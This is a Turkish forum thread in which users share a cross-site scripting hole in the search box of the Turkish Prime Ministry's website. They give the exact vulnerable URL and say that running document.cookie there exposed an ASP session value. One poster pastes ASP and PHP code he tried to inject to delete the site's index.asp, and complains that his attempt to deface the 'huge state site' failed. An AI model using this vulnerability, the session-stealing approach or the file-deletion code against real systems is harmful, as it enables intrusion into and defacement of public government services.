Basbakanlik.Gov.Tr Xss
-
http://www.basbakanlik.gov.tr/
ana sayfadaki searche filtre flaan koymamslar xD
http://www.basbakanlik.gov.tr/sour.ce/index.asp?wpg=8200E8C5-9026-486C-B6B5-D5B7C3D81965&sourceXmlSearchCombo=&sourceXmlSearch=
document.cookie yaptm aspsession falan dedi ise yarar mı blmiom bulunca paylasaym dedm xD
-
bu basbakanlıktaki acık tee ne zaman dan ber var hala kaldırmamıslar mı sadece burda deği bi araştırılsa bir sürü devlet sitesinde açık varda işte hiç önemsemiyorlar. allahtan yabancı hack grupları fazla ugrasmıyor türk kamu sitelerine yoksa .....
-
böyle bişeyler denedim olmadı
<%
Dosya_Sil("/index.asp")
Function Dosya_Sil(yol)
On Error Resume Next
Dim SilinecekDosya
Dim FSO
Set FSO = Server.CreateObject("Scripting.FileSystemObject")
Set SilinecekDosya = FSO.GetFile(yol)
SilinecekDosya.Delete
Set SilinecekDosya=Nothing
Set FSO=Nothing
End Function
%>ve ...
<?php
unlink("/index.asp")
?>
-
1 sene önce de vardı bu, hala kaldırmamışlar mı a.k
-
walla yeni farkettm yaynladm. ha bi de yolbulucu asp calstıramazsn abi javascript veya html falan calıstırabilrsn ( bildgm kdryla )
-
hacı devlet sitelerinde o kadar çok açık varki özellikle de xss
-
FeraGaTT bunu yazdı:
-----------------------------
walla yeni farkettm yaynladm. ha bi de yolbulucu asp calstıramazsn abi javascript veya html falan calıstırabilrsn ( bildgm kdryla )
-----------------------------abü cok heveslendiydim koskoca devlet sitesi heykliycem diye.
azücük php ve asp bilgimle daldım ama olmadı.
